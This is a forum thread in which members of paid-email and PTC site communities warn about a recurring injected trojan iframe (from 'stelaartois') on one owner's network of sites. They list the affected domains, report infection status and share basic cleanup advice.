I had a littlecountryplace page with the stelaartois trojan and went to report it to butterflies n roses where as it was in their PTP got hit by it there too on the report page. toybox was reported earlier as having this back again, assume all Genelle's sites have it again, they are usually all hit together and there's too many of them to go run through Jutaky's checker individually.

It's on Kerosene Cucumber too:

Does someone have a list of Genelles' sites ?

Is she fixing this ?

Thanks

I was also wondering these things Sophie. Last time it happened I did go through her sites with Jutaky's detektor and grabbed site lists from the code. I wrote to her using generic email addresses for several of the sites (support@ and webmaster@) but didn't receive any replies so I have no idea if she even got my messages. I can't visit sites that have this on them to send them a support form, so I have no way to let them know unless an address like that works, and I don't know if the address works unless they reply.

I believe these are amongst Genelle's sites, that she owns or runs or hosts. Apologies for any errors.

hummingbirdsnroses.com
PrancingPenguins
CountryRedneck
SugarLandCash
SweetClickers
CatMails
ButterfliesNRoses
MotherEarthMails
BigDaddyMails
PoolHallPTR
TheToyBoxOnline
purringemail.com
KeroseneCucumber
thelittlestpenguins.com
Foxden
LittleCountryPlace
Pactech hosting
drunkenpenguins

I don't think that is a complete list.

I believe heavenlyemail and destinysdollars are now on pactech hosting and also getting hit when Genelle's get hit recently, although they are not owned by her.

I just checked thetoyboxonline and littlecountryplace and they are both now clean. I have not checked the rest of the sites.

thank you Wagdoll for the warning,
I am happy to say I am only a member at one site of Genelle's - mother earth- which she acquired during the allen fan club transfer, but she seems never to send mails on it, including my gold ads, LOL.

Thanks for the list wagdoll, going to check them now, if they are still infected, I'll add them to the alphabetical list otherwhise I'll leave it at that but as they seem to be a regular target, we'll keep an eye on it

hummingbirdsnroses.com fixed - nothing on homepage
PrancingPenguin fixed - nothing on homepage
CountryRedneck fixed - nothing on homepage
SugarLandCash fixed - nothing on homepage
SweetClickers fixed - nothing on homepage
CatMails fixed - nothing on homepage
ButterfliesNRoses fixed - nothing on homepage
MotherEarthMails fixed - nothing on homepage
BigDaddyMails fixed - nothing on homepage
PoolHallPTR fixed - nothing on homepage
TheToyBoxOnline fixed - nothing on homepage
purringemail.com fixed - nothing on homepage
KeroseneCucumber fixed - nothing on homepage
thelittlestpenguins.com fixed - nothing on homepage
Foxden Googled this one but couldn't find which one was the right one
LittleCountryPlace fixed - nothing on homepage
Pactech hosting fixed - nothing on homepage
drunkenpenguins fixed - nothing on homepage

Genelle also owns GroovyPaidEmails.biz

stellaartois is back...

littlecountryplace.com - infected
thelittlestpenguins.com - infected
thetoyboxonline - infected

had to refresh a few times but the nasty is definitely there.
not sure about the others.

have alerted her about this + alerted her about this thread

stelaartois.ru 5x5 iframe freasing browser and download ActiveX still on thelittlestpenguins.

I came across it on Sparky's PTP. Reported to Tipsy.

Not sure of other sites.

It is definetely still on thetoyboxonline.

I had it too on the penguin PTP one, anyone knows the quickest way to inform Genelle ?

this is the reply I got from them.
So they are aware of the issue and are working on it:

There are now three stellaartois showing on thelittlestpenguins.com.

How can she manage so many site ? Guess the answer is "not".

Looks like littlecountryplace.com is clean but now pactech-hosting.com is infected.

Prancing penguin also infected. Sent contact form.

HI All-

Ok, Billi Here ;-) I have been hit by this nasty too so my sites are in suspended mode right now until I can clean this out or until my host can. We are both working at this, but it seems they are coming back as soon as we clean them so does anyone know how to block this guy? I mean anyone with any ideas how to stop these from being inserted PLEASE PM me lol. I would greatly appreciate the help. Thanks so much!!

Billi

Ami's House
AIM Paid 2 Read
Medieval Mails
Lillyth's Magick Mails
XostedMom's Place

Are you aware that the suspended page also has the trojan on it? I also read that due to this suspended hosting page redirect, that any sites that have banners up for the affected sites are also infected with the trojan. Is there any chance they can be taken offline totally until the suspended page is cleaned - too many people are not protected or even being informed about this trojan.

There's some advice on this site for cleaning it from the server

http://help.lockergnome.com/security/Javas...opict10748.html

Also everyone who has cpanel access needs to scan their own computers and make sure they are clean before going back in there. You could try adding the stelaartois domain to your hosts file on the PC and for the server/cpanel (I don't know the terminology for server stuff), and if you all stay out of the cpanels you might be able to see the IP that the stuff is coming from if it is from an external source rather than staying in the system and just self-reinfecting. Self reinfecting sounds most likely unless there is a cpanel vulnerability that is being hit over and over. If it is coming from an outside IP then that should be blocked at the server level. Also make sure there's no 777 permissions being left open.

I apologise if this is no good, but as I say I don't know anything about servers

Good luck to you XostedMomof3 !


And here we go again littlecountryplace has now 6 of them !

Thanks for the info hun, I have passed it on. Hopefully we will get somewhere with this. IT IS SO FRUSTRATING!!!

That link goes to a 404 not found..

It brings me to a forum, maybe if I repost it :
link

Good luck

http://getpaidforum.com/forums/index.php?showtopic=482717

New hack on one of Genelle's sites. It has a new domain, not stelaartois this time